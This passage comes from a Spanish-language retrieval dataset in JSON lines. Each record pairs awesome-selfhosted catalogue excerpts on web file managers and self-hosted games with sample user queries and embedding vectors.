0.04027, 0.11225, -0.02177, 0.01386, -0.03249, -0.02268, -0.01277, 0.03006, -0.00613, -0.0443, -0.06154, -0.03804, -0.04672, -0.03218, -0.07385, -0.01197]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "que programa web me sirve para organizar y compartir archivos desde cualquier lugar?", "v": [0.01635, 0.16645, -0.10932, -0.21561, -0.01117, -0.14607, 0.03714, -0.05287, -0.07571, -0.14891, -0.10566, -0.12315, 0.06372, -0.11432, 0.08448, 0.02502, 0.19351, -0.10036, 0.10994, 0.05313, -0.08048, 0.12591, -0.00811, 0.02339, -0.04558, -0.15697, 0.1366, -0.0266, -0.10803, 0.01613, -0.00246, 0.00527, 0.03737, -0.04735, 0.06096, 0.00903, 0.11947, 0.06931, -0.11455, -0.07016, -0.10566, 0.05038, -0.08125, 0.11638, 0.02122, -0.00714, 0.02952, -0.049, 0.00495, -0.02102, -0.0418, -0.01091, 0.01693, 0.02819, -0.0345, -0.03639, -0.08711, -0.2216, -0.03101, -0.01702, -0.08156, 0.04534, -0.0237, 0.00144, 0.03727, 0.10641, -0.02743, 0.08527, -0.1223, 0.06592, -0.0635, 0.00896, 0.08033, -0.04369, -4e-05, 0.01705, 0.00653, -0.01048, -0.03265, -0.01295, 0.05663, 0.00712, 0.02892, 0.10467, -0.03214, -0.03483, 0.03727, -0.03246, -0.01053, -0.02163, 0.03899, 0.0243, -0.0041, 0.02456, -0.01274, -0.12495, 0.16673, 0.07085, 0.09414, -0.01113, 0.01686, -0.0961, -0.02895, 0.06701, -0.02468, 0.103, 0.05686, 0.09871, -0.04021, -0.01019, 0.0721, 0.02093, 0.01669, 0.04525, -0.10614, -0.00044, 0.05047, -0.00566, 0.09241, -0.02698, -0.0504, 0.04796, -0.04049, 0.02244, 0.04463, 0.05663, 0.04679, 0.15688, -0.06174, 0.0607, 0.0273, 0.00691, -0.03245, 0.03255, -0.05004, -0.07035, 0.03048, -0.01305, 0.02975, -0.06423, 0.01878, 0.01665, -0.07195, -0.01272, 0.02493, -0.01137, 0.04874, -0.05374, -0.02449, 0.00712, -0.05879, -0.01079, -0.03467, -0.02225, -0.07232, 0.0238, -0.01961, -0.10795, -0.07685, -0.01654, -0.11355, 0.05125, 0.01447, -0.04229, 0.0428, -0.04653, 0.00795, 0.03545, 0.06352, 0.05822, -0.00579, 0.10706, 0.00096, -0.09591, -0.02657, 0.02914, -0.03978, -0.10989, 0.07649, -0.00882, -0.03014, 0.01924, 0.03542, 0.09202, -0.02645, -0.02625, 0.06554, 0.05694, -0.04778, -0.0, 0.01145, -0.0276, -0.03416, -0.02118, -0.00633, -0.04361, -0.11599, -0.03907, 0.05477, -0.02221, -0.04415, -0.06735, -0.02558, 0.05026, -0.01887, 0.03653, -0.02037, -0.05085, 0.05871, 0.07634, -0.0267, -0.03092, 0.03963, -0.05186, -0.05819, -0.0272, 0.03029, 0.01532, 0.04075, 0.03059, -0.01211, -0.02021, 0.00697, -0.03931, 0.02501, -0.03956, 0.01985, -0.0111, 0.03879, 0.01741, -0.03451, -0.02198, 0.00862, 0.00621, 0.01177, -0.04881, -0.02161, -0.04398, -0.02072, -0.05827, -0.0658, 0.04955, 0.00153, -0.03834, -0.04647, -0.02508, -0.05634, 0.04135, -0.01765, -0.00635, -0.01934, 0.02434, 0.05142, 0.02214, -0.03123, 0.07309]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "necesito una herramienta para gestionar mis archivos en servidores remotos como SFTP o Google Drive", "v": [0.03698, -0.07825, -0.09821, -0.32572, 0.05995, -0.08004, 0.02043, -0.04469, 0.00685, 0.03604, -0.11626, -0.04162, 0.1155, -0.05966, 0.1175, 0.04108, 0.15825, -0.08227, -0.02424, -0.01105, -0.02818, 0.02482, 0.07021, -0.09866, -0.04285, -0.04765, 0.07045, -0.01887, -0.1547, 0.03417, 0.07387, -0.05867, -0.03591, -0.09478, -0.09993, -0.01776, -0.04157, 0.14334, -0.05572, 0.00262, 0.07385, 0.08372, -0.20095, 0.08329, -0.0042, -0.01688, 0.10831, -0.10401, -0.00073, 0.02496, -0.07186, -0.1501, -0.10478, -0.02077, -0.07003, -0.00588, 0.16276, -0.16362, -0.02571, 0.00982, -0.18188, 0.01339, -0.02991, 0.01694, -0.01517, -0.03694, 0.05993, 0.00275, -0.20413, 0.02634, -0.10128, 0.0673, 0.04388, -0.00474, 0.01174, 0.0121, 0.04822, 0.01366, 0.01832, 0.027, 0.0632, -0.00304, -0.11028, -0.03554, -0.20137, -0.18714, 0.07539, 0.0339, -0.00668, -0.03978, -0.06556, 0.02272, -0.05596, 0.01251, 0.02418, 0.07682, 0.12946, -0.10971, -0.04266, -0.01533, 0.06064, 0.04169, 0.00709, 0.0765, -0.06994, 0.03329, 0.06648, -0.06305, 0.04117, -0.01718, 0.01273, -0.02409, 0.04251, -0.01807, -0.03174, 0.00941, -0.00225, -0.05645, 0.02657, 0.00068, -0.07086, -0.01043, 0.01349, 0.00054, 0.0234, -0.00601, -0.00816, 0.02584, 0.01607, -0.0318, 0.00079, -0.02006, -0.09063, -0.02621, -0.02657, 0.07191, 0.01431, -0.06431, -0.0073, -0.10093, -0.0134, 0.02157, 0.00501, -0.03287, 0.1106, -0.00922, 0.04424, -0.02545, -0.03952, -0.05322, -0.00955, -0.07643, -0.02587, -0.01067, -0.03907, 0.03628, -0.09349, -0.0928, -0.13162, -0.01571, -0.02469, -0.04174, -0.01522, 0.04632, 0.0226, -0.04215, 0.03323, 0.04486, 0.04593, -0.00936, -0.0536, 0.0387, 0.03934, -0.06716, 0.01259, -0.03771, -0.0094, -0.00477, 0.06851, 0.00294, -0.02052, 0.01394, -0.00087, 0.00915, 0.00768, -0.0171, -0.00071, 0.00016, 0.01429, 0.02754, -0.01449, 0.03543, 0.0038, -0.02959, 0.03028, -0.03996, -0.05686, -0.04035, 0.00256, 0.00521, -0.02361, -0.04117, -0.00211, -0.02219, 0.01064, -0.00777, 0.03028, 0.07249, 0.01017, 0.02623, 0.01239, -0.05532, 0.05134, -0.02493, 0.03565, -0.02543, 0.00399, -0.00314, 0.01659, -0.03073, 0.00383, -0.00654, 0.02218, -0.01829, -0.02668, 0.05828, 0.01512, -0.00931, -0.01438, -0.05327, 0.0368, 0.00169, -0.01242, 0.00855, 0.05862, -0.02683, -0.00342, -0.06044, -0.01325, 0.01343, -0.03468, 0.04236, -0.01149, -0.00076, -0.05989, -0.09529, -0.09739, -0.00253, -0.03592, -0.0147, -0.00137, -0.00797, 0.04371, 0.00018, -0.0211, 0.00425]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "busco una alternativa gratuita a los gestores de carpetas para ordenar mis recursos digitales sin internet", "v": [0.26829, -0.08228, -0.10054, -0.07548, 0.04448, -0.04748, 0.03524, -0.01913, -0.19348, -0.09135, -0.00962, -0.20228, -0.04608, -0.07374, 0.07265, -0.05028, 0.10074, 0.0082, 0.11292, -0.13538, 0.0373, -0.00763, 0.03998, -0.02713, -0.14194, -0.11071, -0.00595, -0.13408, -0.08703, 0.09133, 0.00882, 0.00776, 0.01108, -0.05773, -0.10224, -0.0554, -0.01522, 0.08186, -0.02095, -0.10129, 0.12069, 0.14257, -0.05535, 0.09318, 0.01415, -0.06185, -0.00377, -0.05186, -0.01359, -0.00993, -0.09235, -0.08077, -0.13055, 0.02133, -0.00669, -0.06532, 0.15529, -0.1153, 0.0177, -0.08927, -0.0271, 0.00218, 0.02806, 0.07267, 0.05818, 0.10695, 0.05269, 0.02449, -0.1851, 0.08537, 0.03542, 0.13306, 0.05682, -0.01447, 0.00169, 0.04907, 3e-05, -0.00479, 0.00051, -0.00755, 0.03738, -0.01881, 0.02658, 0.06976, -0.11839, -0.07701, -0.0124, -0.09172, -0.03594, -0.07385, -0.00088, 0.05293, -0.00808, -0.01935, -0.05396, -0.01606, 0.07426, -0.00161, -0.03809, 0.08203, -0.00965, 0.05391, -0.1129, 0.05677, -0.05161, 0.02227, -0.02279, 0.02662, -0.01937, -0.02809, -0.0193, 0.02548, 0.08211, 0.04625, 0.02898, -0.00989, 0.06887, -0.00056, -0.01323, 0.0406, -0.00599, -0.04769, 0.00383, -0.00087, 0.10105, 0.0857, 0.09633, 0.00681, 0.049, -0.0511, 0.03299, -0.05261, -0.03794, -0.09007, -0.09952, 0.0282, -0.05677, -0.04693, 0.08239, -0.0912, -0.05058, -0.02268, -0.02273, -0.0265, 0.02742, -0.03309, 0.10698, -0.08856, -0.08978, -0.05483, -0.06203, -0.00221, -0.0398, 0.03979, -0.00331, 0.0504, -0.06075, -0.03439, -0.13524, 0.02418, -0.01434, -0.09108, 0.02702, 0.02762, -0.05625, -0.01547, -0.05125, 0.05055, -0.03992, 0.03619, -0.02236, 0.01765, 0.02102, -0.0566, -0.04759, -0.00425, -0.02031, -0.01626, 0.04774, 0.01341, -0.01522, -0.05081, -0.02298, 0.01633, -0.07867, -0.01745, -0.03739, 0.00981, -0.04396, 0.06549, 0.09393, 0.02782, -0.09143, 0.05289, 0.05179, -0.05632, -0.01538, 0.01592, -0.00827, 0.00084, -0.07063, -0.02748, -0.04539, -0.02262, -0.01861, 0.04926, -0.03507, 0.00231, -0.05034, 0.08174, -0.0123, -0.00591, 0.02888, -0.07992, -0.0463, -0.01396, 0.01696, -0.0377, -0.05067, -0.04044, 0.03172, -0.01394, 0.03721, 0.03075, 0.08132, 0.07222, -0.00363, 0.01207, -0.0328, -0.05117, -0.00095, -0.0672, -0.00723, -0.0193, -0.00431, 0.00296, 0.01865, 0.0015, -0.06396, 0.0215, -0.04106, 0.04758, -0.01201, 0.03303, 0.0006, -0.07409, -0.11423, 0.00327, -0.02961, -0.03011, -0.00071, 0.00439, -0.01727, 0.02075, -0.01338, 0.03585]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Tiny File Manager β€” Web based File Manager in PHP, simple, fast and small file manager with a single file [GPL-3.0, PHP].", "indexar": "ΒΏExiste un gestor de archivos web sencillo en PHP?", "v": [-0.11895, -0.0416, 0.02198, -0.2253, -0.05454, -0.0851, -0.00552, -0.14594, -0.03042, -0.09029, -0.04433, 0.07339, -0.01183, -0.01489, 0.08451, -0.04393, 0.05608, -0.0489, 0.0607, -0.06792, -0.09851, 0.11375, -0.01746, -0.09969, -0.0792, -0.04178, -0.00506, 0.04953, -0.08487, -0.06744, 0.04221, 0.00142, -0.05106, -0.00682, -0.0816, 0.15693, 0.0835, 0.036, -0.06643, 0.04519, 0.00463, 0.02604, -0.0399, 0.08466, -0.03615, -0.02539, 0.1031, -0.14569, 0.14479, 0.02433, -0.00156, -0.08286, -0.10462, 0.07525, -0.02859, 0.01816, 0.02603, -0.21338, 0.03321, 0.04622, -0.05711, 0.0002, -0.03726, 0.001, -0.05297, 0.13391, 0.07078, 0.09489, -0.07108, 0.09557, -0.0202, 0.05779, -0.02115, 0.06573, 0.0509, 0.03179, 0.07337, -0.04737, -0.09692, 0.00776, 0.02431, -0.0424, 0.02858, -0.01568, -0.08622, -0.09622, -0.04217, -0.12657, 0.00806, -0.02597, 0.14395, -0.02147, -0.04291, -0.02223, -0.13187, -0.09421, 0.04847, -0.02739, -0.08982, -0.08798, -0.09275, -0.00647, 0.03833, 0.0615, 0.1107, 0.08695, 0.11383, 0.11339, -0.1084, -0.11546, 0.05634, -0.03121, -0.01142, -0.00518, -0.04423, 0.05557, 0.06272, 0.00639, -0.08157, -0.10339, -0.00628, -0.03973, -0.06543, 0.06521, 0.11323, -0.01076, 0.0898, 0.07371, 0.01189, -0.01597, 0.00812, -0.08984, -0.04562, 0.0421, -0.05419, 0.16383, 0.07024, 0.07218, 0.03594, 0.01219, -0.06716, -0.04481, -0.04725, 0.04676, 0.08874, -0.06256, 0.02209, 0.03095, -0.02329, 0.01353, 0.00101, -0.09422, -0.02508, -0.03787, -0.09541, -0.03475, 0.03047, -0.0505, -0.07889, -0.03779, -0.05113, 0.03647, 0.02574, 0.00793, -0.04198, -0.04515, -0.0392, 0.06453, 0.03941, -0.01343, 0.04547, 0.09102, 0.03589, -0.07437, 0.00987, 0.01004, -0.04499, -0.10416, 0.02131, 0.02056, 0.04877, -0.04223, 0.01349, 0.0619, -0.0204, 0.00444, 0.05029, 0.08383, -0.04967, 0.04127, 0.04033, -0.02768, -0.05014, -0.00419, 0.03871, 0.06501, -0.00165, -0.04261, -0.01761, 0.00428, -0.0192, -0.08338, 0.08852, -0.02676, 0.01146, -0.01055, -0.0044, -0.00383, 0.00953, -0.01216, -0.01757, 0.02033, 0.04562, 0.00597, 0.07892, -0.05458, 0.03156, 0.02549, 0.03733, -0.0198, -0.0373, 0.00096, 0.02536, -0.01907, 0.02556, 0.04279, -0.05501, -0.02946, -0.05292, 0.01853, -0.07943, -0.04266, -0.0202, 0.0002, 0.0241, 0.00108, -0.01449, -0.00082, -0.06158, 0.0212, 0.04109, 0.03847, -0.0129, 0.01994, -0.04947, -0.07323, 0.00335, -0.00784, -0.01006, 0.00945, -0.01952, -0.04691, -0.07785, 0.01822, -0.03657, 0.04989]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Tiny File Manager β€” Web based File Manager in PHP, simple, fast and small file manager with a single file [GPL-3.0, PHP].", "indexar": "ΒΏQuΓ© programa online sirve para mover y organizar archivos de forma rΓ‘pida?", "v": [-0.05467, 0.06653, -0.08344, -0.21701, -0.03786, -0.13556, 0.04119, 0.01235, -0.07788, -0.16766, -0.11687, -0.15969, 0.19625, -0.08194, 0.03957, -0.02699, 0.18184, -0.11782, 0.00116, 0.07258, -0.05165, 0.07204, 0.04867, -0.03414, -0.02507, -0.07614, 0.10565, 0.0278, -0.18703, -0.04594, -0.04641, 0.01314, 0.12559, -0.005, 0.04751, 0.02656, 0.06771, 0.02147, -0.09276, 0.01349, -0.10509, 0.05106, -0.10679, 0.08472, 0.03268, 0.02164, 0.00156, -0.03124, 0.01486, 0.02816, 0.04962, 0.02195, 0.06419, 0.01493, -0.02682, -0.08958, -0.1067, -0.18535, -0.03529, -0.00042, -0.01859, 0.00867, -0.07604, -0.00807, 0.00762, 0.02368, 0.00487, 0.01588, -0.15269, 0.00432, -0.05245, -0.01799, 0.08346, 0.04925, -0.07456, 0.06413, -0.01052, -0.02495, 0.00065, 0.02795, 0.08308, 0.08399, -0.03401, 0.06789, -0.02613, -0.05101, -0.0185, -0.00135, 0.01907, 0.02539, 0.03724, 0.06823, 0.05578, 0.07322, 0.03539, -0.07071, 0.06573, 0.04974, 0.07332, 0.00641, -0.02416, -0.08368, -0.05397, 0.1107, -0.09427, 0.06911, 0.05501, 0.0895, -0.07876, -0.01217, 0.06691, 0.05565, -0.00081, 0.0728, -0.04053, -0.0241, 0.00482, 0.0144, 0.00532, -0.01837, -0.02835, 0.06873, 0.05809, -0.00572, 0.07313, -0.01425, 0.07607, 0.1302, -0.04522, 0.08034, 0.07416, -0.03576, -0.04467, -0.05563, -0.07564, -0.10562, 0.04044, 0.01658, 0.06703, -0.09755, 0.05531, 0.05423, -0.08731, -0.00155, 0.05635, -0.03448, 0.12185, -0.00171, -0.0474, 0.01408, 0.01121, -0.01417, 0.00096, -0.02816, -0.0407, -0.03707, -0.06194, -0.08838, -0.13623, 0.00155, -0.07633, 0.03212, -0.01742, -0.07534, -0.01268, -0.08577, 0.07133, 0.06554, 0.04829, 0.03338, 0.01493, 0.07649, -0.00227, -0.06415, -0.02161, 0.08466, -0.08196, -0.05615, 0.07288, -0.02855, 0.01045, 0.01169, 0.06185, 0.07353, -0.03362, -0.04026, 0.09264, 0.00212, -0.05735, 0.06106, 0.02897, -0.0202, -0.06978, -0.03, -0.00265, -0.05329, -0.08485, -0.00025, 0.05931, -0.02198, -0.02892, -0.14283, 0.0027, 0.06201, -0.00369, 0.06915, -0.01606, -0.01896, 0.07284, 0.06305, -0.0179, -0.02351, 0.0696, -0.01432, -0.02082, -0.01592, -0.02072, 0.00049, 0.03488, 0.00573, -0.03764, -0.01397, -0.03361, 0.00843, 0.04041, -0.03608, 0.02591, -0.02847, -0.00431, 0.0173, 0.02635, -0.03627, 0.04439, 0.00181, -0.01291, -0.04496, 0.03422, -0.03769, -0.02555, -0.01007, -0.04187, 0.00312, -0.0022, -0.01695, -0.05443, -0.01428, -0.01325, 0.02376, -0.03074, 0.02387, -0.03105, -0.00267, 0.02088, -0.00861, 0.02563, 0.1076]} -{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Tiny File Manager β€” Web based File Manager in PHP, simple, fast and small file manager with a single file [GPL-3.0, PHP].", "indexar": "Busco una herramienta web ligera para gestionar mis archivos sin instalar nada pesado.", "v": [0.00882, -0.07967, -0.20115, -0.24848, -0.02698, -0.10021, -0.12803, -0.06542, -0.16066, -0.08604, -0.06513, -0.06001, -0.04456, 0.00235, 0.13265, 0.02286, -0.0108, -0.09389, 0.01769, -0.05527, -0.05023, 0.08858, -0.03123, -0.01368, -0.05766, -0.05968, 0.0185, -0.06571, -0.23056, 0.01671, -0.09767, 0.0781, 0.0879, -0.02963, -0.0241, 0.0267, -0.01247, 0.00649, 0.00551, 0.10823, 0.01453, 0.159, 0.01326, 0.0765, -0.01296, -0.1393, 0.1327, -0.09107, 0.0888, 0.05092, 0.00128, -0.10547, -0.07755, -0.00723, -0.02526, -0.1222, 0.14305, -0.14704, 0.0963, -0.04871, -0.14489, 0.15069, -0.04831, 0.04929, -0.05967, 0.059, 0.00059, -0.0499, -0.12773, 0.0773, 0.05205, 0.06229, 0.10141, 0.00538, -0.01473, 0.05013, 0.04819, 0.10151, 0.01772, -0.00332, 0.12262, -0.05522, 0.01763, 0.01227, -0.12707, -0.1218, 0.06645, -0.01673, 0.01573, -0.0267, 0.02859, -0.07632, -0.0515, -0.07479, 0.04266, -0.0468, 0.07679, -0.03786, -0.03415, -0.0348, 0.04272, -0.00893, -0.01682, 0.08249, 0.02762, 0.03807, -0.05513, -0.00157, -0.07865, -0.08755, 0.08131, 0.0209, 0.07603, 0.0814, 0.02867, 0.1682, 0.01337, -0.02507, -0.08199, -0.04543, 0.00244, 0.04368, -0.00248, 0.04353, 0.05361, -0.02991, 0.03083, 0.08428, -0.04953, -0.00852, 0.00233, -0.07938, -0.01234, 0.06974, -0.07974, -0.01729, -0.03121, -0.04715, -0.02195, -0.05722, -0.01084, 0.0164, -0.11607, 0.00948, 0.08662, 0.00526, -0.01524, -0.00239, -0.01119, -0.05251, 0.04264, -0.05908, 0.03194, 0.02357, -0.05017, 0.00617, 0.02011, -0.00619, -0.10998, -0.02113, -0.01754, 0.0007, -0.00858, -0.00366, -0.01849, -0.00873, -0.02084, 0.06983, -0.00038, 0.02585, 0.03123, 0.02689, 0.01724, -0.00806, 0.06252, -0.02185, -0.02429, -0.0562, 0.07424, -0.05572, -0.03913, -0.00269, 0.01649, 0.0865, -0.00087, -0.0248, -0.00754, 0.00267, -0.09153, 0.04983, 0.05256, 0.02985, -0.03975, -0.03772, 0.05873, 0.0442, -0.02923, -0.08561, -0.02394, 0.04272, 0.00471, -0.05471, -0.03586, 0.02697, -0.0121, 0.04841, 0.00411, 0.023, 0.02875, 0.02281, -0.00397, 0.02977, -0.00198, -0.03532, 0.0424, -0.04104, 0.0136, 0.00867, 0.02109, -0.00329, 0.00576, -0.00607, 0.05373, 0.01557, -0.04104, 0.01905, -0.02627, 0.02067, -0.02377, -0.0186, -0.01524, -0.03883, -0.02027, 0.04133, 0.02015, -0.09619, 0.02664, 0.00514, -0.06845, 0.00555, -0.0046, 0.03297, 0.05418, 0.00324, -0.04522, -0.01495, 0.03509, 0.01504, -0.02038, -0.02453, 0.00806, 0.03838, 0.03751, -0.01547, 0.00821, 0.04822]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "que juegos de estrategia en tiempo real para antiguo hay que sean multiplataforma", "v": [-0.07486, 0.02162, -0.07334, -0.04161, -0.08693, -0.02523, -0.07896, -0.03293, 0.05519, -0.02612, -0.03184, -0.00416, 0.05966, 0.0074, 0.14364, 0.00789, 0.08804, -0.00289, 0.04988, -0.13044, -0.05326, -0.07732, -0.04773, -0.10782, -0.06399, 0.02505, 0.10311, 0.0893, -0.05128, 0.10529, -0.01864, 0.07147, 0.15624, -0.15821, -0.0476, -0.03411, 0.06302, 0.08241, -0.00462, 0.00868, -0.01916, 0.06784, -0.04307, -0.12216, 0.0798, 0.06485, -0.0454, -0.03197, -0.13169, -0.06983, -0.09986, 0.03361, -0.03009, -0.08686, 0.07905, -0.10943, 0.01145, -0.10119, -0.10439, -0.06359, -0.09956, -0.07062, -0.0557, -0.05961, 0.03482, 0.06601, 0.00431, 0.03001, 0.05338, 0.01631, 0.01828, -0.08296, 0.0374, -0.00667, -0.06519, -0.01658, 0.05438, -0.07205, -0.09621, -0.01242, 0.08183, -0.18374, -0.16423, 0.1327, -0.08156, -0.01884, 0.0237, -0.01723, -0.02653, -0.01893, -0.02113, -0.04328, -0.08417, 0.04335, -0.06863, -0.09958, -0.01973, -0.0842, 0.06067, 0.09783, 0.02854, -0.03702, -0.13423, 0.06089, -0.10919, 0.02214, 0.01899, -0.0393, -0.02917, -0.0012, -0.07904, -0.00676, -0.04718, 0.06625, 0.06013, 0.1069, 0.0517, 0.00823, 0.02772, 0.02603, -0.1252, 0.00845, -0.0003, 0.04643, -0.01808, 0.02249, -0.08888, -0.09066, -0.03299, -0.08402, -0.05328, 0.02322, -0.01661, 0.07584, -0.07385, -0.04489, 0.05738, 0.04384, -0.07631, -0.00177, 0.01341, 0.10079, -0.04337, -0.07875, -0.01043, 0.01367, 0.13004, -0.07862, -0.05874, 0.01742, 0.02976, -0.00534, 0.06954, 0.03262, -0.01531, -0.02272, 0.01797, -0.0056, -0.09485, 0.08317, -0.01654, 0.05251, -0.06956, 0.00113, 0.04903, -0.11486, 0.02041, 0.03188, 0.01961, -0.02941, 0.00738, -0.00819, 0.05991, -0.08313, -0.03213, 0.04964, -0.04741, -0.02329, -0.00592, -0.04408, 0.05924, -0.07011, 0.03631, 0.06612, -0.01925, -0.1585, 0.02474, 0.01139, 0.01982, -0.06361, 0.02724, -0.01557, -0.00181, 0.13031, 0.01269, -0.04365, 0.10139, 0.01398, 0.00905, -0.03675, -0.00981, -0.05514, 0.04797, -0.01045, -0.07686, 0.07495, -0.01157, 0.01544, 0.0105, 0.03642, 0.04674, -0.04179, 0.00819, -0.0133, 0.00535, -0.07131, 0.02993, -0.04772, 0.01586, 0.02842, -0.00466, 0.01741, -0.0023, -0.04588, -0.12352, -0.02788, 0.04593, 0.07909, 0.01238, -0.05412, -0.03171, 0.04381, -0.01232, 0.05469, 0.00141, -0.01696, 0.10925, -0.02186, -0.06081, -0.05295, 0.06065, -0.09107, -0.03, -0.02425, -0.01546, -0.09243, -0.08562, -0.06887, 0.00707, -0.07535, -0.03756, -0.00587, -0.00272, -0.01511, -0.01255, -0.00642]} -{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "con que puedo jugar a un juego de aventura por texto directamente en el navegador sin instalar nada", "v": [-0.117, 0.09313, -0.1982, -0.11834, -0.07775, 0.00414, -0.06453, -0.02555, 